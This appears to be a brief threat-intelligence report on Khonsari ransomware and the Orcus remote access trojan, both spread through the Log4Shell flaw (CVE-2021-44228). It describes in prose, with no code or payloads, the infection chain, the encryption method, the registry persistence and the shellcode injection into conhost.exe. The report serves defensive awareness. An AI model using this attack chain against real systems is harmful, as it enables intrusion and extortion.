A new type of ransomware and a Remote Access Trojan (RAT) have been discovered being installed via the log4j vulnerability, also known as “Log4Shell.” Log4Shell, tracked as CVE-2021-44228, is a vulnerability within the log4j module, which is used extensively for logging purposes in Java-based applications. The vulnerability allows an attacker to remotely send a specially crafted payload that, when logged by the receiving server, triggers a lookup function to be invoked and executes a file from a remote location. This allows an attacker to execute arbitrary code on the targeted server.
The new ransomware, called Khonsari, targets vulnerable Java applications running on Windows operating systems. The ransomware uses the Log4Shell vulnerability to force the victim system to download an additional payload, which is the main ransomware payload of Khonsari. This malicious .NET binary then executes and encrypts all drives on the device, as well as all user’s personal directories, such as their Desktop or Downloads folders. The ransomware uses an AES 128 CBC algorithm to perform the encrypting, and adds the extension “.khonsari” to each file. As typical with ransomware, a ransom note is then created that informs the user to send the threat actor Bitcoin in order to get their files decrypted.
Researchers have also seen a RAT being installed via the Log4Shell vulnerability. This RAT, called Orcus, follows a similar pattern of infection as the Khonsari ransomware; the Log4Shell vulnerability is used to force the victim to download and execute a secondary payload, which is the main Orcus malware dropper. From there, the Orcus malware establishes persistence via the Run registry key and then downloads shellcode from an external site and injects it into the conhost.exe process. The payload then starts beaconing to its command-and-control server, completing the infection.
The relative ease of exploitation of Log4Shell makes it a prime target of attack for threat actors, so it is likely that there will be more types of malware being deployed using this vulnerability.